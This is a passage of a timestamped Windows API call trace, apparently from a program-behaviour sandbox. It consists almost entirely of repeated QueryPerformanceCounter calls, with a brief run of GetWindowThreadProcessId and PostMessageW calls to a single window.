lpPerformanceCount=0x6adfdfc*=3097659789277) returned 1 [0157.779] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097659811746) returned 1 [0157.795] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097661367592) returned 1 [0157.795] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097661394550) returned 1 [0157.811] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097662959005) returned 1 [0157.811] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097662975892) returned 1 [0157.827] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097664559848) returned 1 [0157.827] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097664577044) returned 1 [0157.843] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097666168228) returned 1 [0157.843] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097666192545) returned 1 [0157.863] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097668229839) returned 1 [0157.863] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097668247715) returned 1 [0157.879] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097669789162) returned 1 [0157.879] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097669810772) returned 1 [0157.895] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097671391823) returned 1 [0157.895] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097671414889) returned 1 [0157.914] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097673268433) returned 1 [0157.914] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097673287278) returned 1 [0157.929] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097674844911) returned 1 [0157.930] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097674886274) returned 1 [0157.945] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097676438170) returned 1 [0157.946] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097676475456) returned 1 [0157.961] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097678035356) returned 1 [0157.961] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097678052471) returned 1 [0157.988] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097680670447) returned 1 [0157.988] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097680710843) returned 1 [0158.002] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097682113624) returned 1 [0158.002] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097682131983) returned 1 [0158.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097683724482) returned 1 [0158.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097683747509) returned 1 [0158.038] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097685675045) returned 1 [0158.038] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097685700878) returned 1 [0158.065] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097688380671) returned 1 [0158.065] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097688400320) returned 1 [0158.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097688869928) returned 1 [0158.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097688897274) returned 1 [0158.087] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097690598574) returned 1 [0158.087] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097690615769) returned 1 [0158.102] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097692065910) returned 1 [0158.102] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097692089120) returned 1 [0158.118] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097693731831) returned 1 [0158.119] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097693768422) returned 1 [0158.134] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097695275780) returned 1 [0158.134] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097695304269) returned 1 [0158.150] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097696865320) returned 1 [0158.150] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097696883569) returned 1 [0158.166] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097698464793) returned 1 [0158.166] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097698483573) returned 1 [0158.182] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097700069244) returned 1 [0158.182] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097700109767) returned 1 [0158.198] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097701666695) returned 1 [0158.198] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097701690287) returned 1 [0158.214] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097703280156) returned 1 [0158.214] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097703304728) returned 1 [0158.230] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097704868132) returned 1 [0158.230] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097704890145) returned 1 [0158.246] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097706465162) returned 1 [0158.246] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097706481490) returned 1 [0158.262] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097708068092) returned 1 [0158.262] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097708101811) returned 1 [0158.278] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097709657976) returned 1 [0158.278] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097709673720) returned 1 [0158.294] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097711316336) returned 1 [0158.294] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097711337275) returned 1 [0158.310] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097712883149) returned 1 [0158.310] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097712896607) returned 1 [0158.326] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097714484393) returned 1 [0158.326] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097714498221) returned 1 [0158.343] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097716161873) returned 1 [0158.343] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097716175508) returned 1 [0158.358] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097717729198) returned 1 [0158.358] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097717742492) returned 1 [0158.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097721865724) returned 1 [0158.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097721878734) returned 1 [0158.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097721910374) returned 1 [0158.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097721921746) returned 1 [0158.406] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097722529100) returned 1 [0158.406] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097722542509) returned 1 [0158.730] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097754948330) returned 1 [0158.731] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097754972575) returned 1 [0158.743] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097756236586) returned 1 [0158.743] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097756250382) returned 1 [0158.759] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097757845548) returned 1 [0158.760] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097757863427) returned 1 [0158.775] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097759442934) returned 1 [0158.776] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097759465683) returned 1 [0158.791] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097761055454) returned 1 [0158.792] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097761079683) returned 1 [0158.807] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097762637528) returned 1 [0158.808] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097762655711) returned 1 [0158.823] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097764238122) returned 1 [0158.824] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097764290936) returned 1 [0158.840] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097765869434) returned 1 [0158.840] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097765887271) returned 1 [0158.855] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097767438646) returned 1 [0158.856] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097767460977) returned 1 [0158.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097769027933) returned 1 [0158.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097769043758) returned 1 [0158.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097770630194) returned 1 [0158.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097770646237) returned 1 [0158.903] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097772241146) returned 1 [0158.904] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097772258920) returned 1 [0158.919] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097773843552) returned 1 [0158.920] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097773860215) returned 1 [0158.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097775443056) returned 1 [0158.936] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097775461182) returned 1 [0158.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097777040962) returned 1 [0158.952] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097777060306) returned 1 [0158.968] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097778682777) returned 1 [0158.968] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097778698731) returned 1 [0158.986] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097780457056) returned 1 [0158.986] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097780478010) returned 1 [0159.001] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097782049383) returned 1 [0159.002] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097782072778) returned 1 [0159.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097783655805) returned 1 [0159.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097783680466) returned 1 [0159.034] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097785348511) returned 1 [0159.035] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097785387194) returned 1 [0159.050] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097786941243) returned 1 [0159.051] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097786957443) returned 1 [0159.066] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097788549999) returned 1 [0159.067] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097788587226) returned 1 [0159.082] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097790142369) returned 1 [0159.083] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097790161387) returned 1 [0159.098] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097791750844) returned 1 [0159.099] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097791772875) returned 1 [0159.114] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097793338771) returned 1 [0159.114] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097793353983) returned 1 [0159.130] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097794954223) returned 1 [0159.131] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097794975938) returned 1 [0159.147] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097796608445) returned 1 [0159.147] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097796640068) returned 1 [0159.163] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097798211493) returned 1 [0159.163] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097798225947) returned 1 [0159.179] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097799811683) returned 1 [0159.179] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.179] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x366ebd24, lParam=0x3d09) returned 1 [0159.179] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097799845851) returned 1 [0159.195] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097801417691) returned 1 [0159.195] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.195] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x366efbe0, lParam=0x3d09) returned 1 [0159.196] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097801465334) returned 1 [0159.211] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097803019193) returned 1 [0159.211] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.211] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x366f3a6f, lParam=0x3d09) returned 1 [0159.212] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097803059332) returned 1 [0159.227] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097804616749) returned 1 [0159.227] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.227] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x366f78d7, lParam=0x3d09) returned 1 [0159.228] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097804677294) returned 1 [0159.243] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097806218758) returned 1 [0159.243] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.243] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x366fb76b, lParam=0x3d09) returned 1 [0159.244] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097806256699) returned 1 [0159.259] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097807809739) returned 1 [0159.259] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.259] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x366ff591, lParam=0x3d09) returned 1 [0159.259] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097807840354) returned 1 [0159.275] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097809417662) returned 1 [0159.275] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.275] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x36703460, lParam=0x3d09) returned 1 [0159.276] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097809460177) returned 1 [0159.291] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097811014973) returned 1 [0159.291] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.291] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x367072c5, lParam=0x3d09) returned 1 [0159.291] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097811052935) returned 1 [0159.307] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097812631208) returned 1 [0159.307] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.308] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x3670b1e8, lParam=0x3d09) returned 1 [0159.308] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097812671565) returned 1 [0159.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097814214877) returned 1 [0159.323] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.323] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x3670efc4, lParam=0x3d09) returned 1 [0159.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097814247342) returned 1 [0159.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097815824036) returned 1 [0159.339] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0159.339] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x36712ea0, lParam=0x3d09) returned 1 [0159.340] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097815866298) returned 1 [0159.362] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097818110405) returned 1 [0159.362] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097818136475) returned 1 [0159.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097818992990) returned 1 [0159.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097819010661) returned 1 [0159.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097820592823) returned 1 [0159.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097820609499) returned 1 [0159.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097822198295) returned 1 [0159.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097822219002) returned 1 [0159.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097823798299) returned 1 [0159.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097823818708) returned 1 [0159.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097825410889) returned 1 [0159.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097825435562) returned 1 [0159.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097826966174) returned 1 [0159.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097826984871) returned 1 [0159.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097828567323) returned 1 [0159.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097828585382) returned 1 [0159.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097830167390) returned 1 [0159.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097830184545) returned 1 [0159.499] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097831766949) returned 1 [0159.499] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097831784374) returned 1 [0159.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097833367696) returned 1 [0159.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097833385497) returned 1 [0159.531] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097834963570) returned 1 [0159.531] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097834981557) returned 1 [0159.547] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097836566172) returned 1 [0159.547] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097836584132) returned 1 [0159.602] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097842057220) returned 1 [0159.602] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097842077110) returned 1 [0159.604] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097842308766) returned 1 [0159.604] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097842325871) returned 1 [0159.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097842949153) returned 1 [0159.611] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097842965850) returned 1 [0159.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097844513536) returned 1 [0159.626] QueryPerformanceCounter (in: 